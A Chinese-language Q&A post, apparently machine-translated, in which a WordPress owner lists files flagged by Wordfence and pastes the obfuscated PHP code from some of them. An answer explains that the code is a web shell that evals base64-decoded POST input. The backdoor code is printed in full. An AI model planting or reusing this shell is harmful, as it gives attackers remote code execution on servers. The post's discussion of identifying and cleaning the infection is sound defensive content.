我刚刚运行了插件Wordfence,它给了我一些问题需要解决。
有两组具有相同的可疑代码:
File appears to be malicious: wp-admin/cache/alias90.php
File appears to be malicious: wp-content/languages/plugins/title.php
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/lib.php
File appears to be malicious: wp-includes/js/tinymce/utils/blog.php
File appears to be malicious: wp-content/uploads/2013/start24.php
描述说明:此文件似乎是由黑客安装来执行恶意活动。如果您了解此文件,则可以选择忽略它以将其从将来的扫描中排除。我们在此文件中找到的与已知恶意文件匹配的文本是:“@ $ GLOBALS [$ GLOBALS ['y23c'] [67]。$ GLOBALS ['y23c'] [76]。$ GLOBALS ['y23c'] [ 76]”。
第二组:
File appears to be malicious: wp-content/plugins/wp-htaccess-editor/pages/gallery.php.suspected
File appears to be malicious: wp-content/themes/themename/languages/dump.php.suspected
File appears to be malicious: wp-content/uploads/2013/05/help.php.suspected
File appears to be malicious: wp-content/uploads/2014/04/model.php.suspected
File appears to be malicious: wp-content/uploads/2015/06/blog.php.suspected
描述如下:此文件似乎由黑客安装以执行恶意活动。如果您了解此文件,则可以选择忽略它以将其从将来的扫描中排除。我们在此文件中找到的与已知恶意文件匹配的文本是:“strtolower($ sF [4]。$ sF [5]。$ sF [9]”。
我该怎么办这些文件?他们真的是恶意软件吗?
编辑:第二组中的文件具有此代码
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n726b60'])) {
eval($s21(${$s20}['n726b60']));
}
?>
EDIT2:我评估了该代码并将其返回:
base64_decode($_POST['n726b60']);
这有什么危险吗?
答案 0 :(得分:2)
它是一个用于在您的服务器上运行恶意代码的shell。它们通常通过在线机器人上传到您的服务器,扫描站点是否易受攻击的wordpress插件。本质上,shell代码允许它们使用$_POST函数根据eval变量的输入运行代码。
我在一个客户端wordpress网站上鼓励了这一点,他们有大量不必要的插件应该被禁用+删除。
我会认真考虑通过谷歌查看你的所有wordpress插件,看看你是否能找到公开发布的任何漏洞。另外,尝试浏览所有目录并删除与这些目录类似的文件。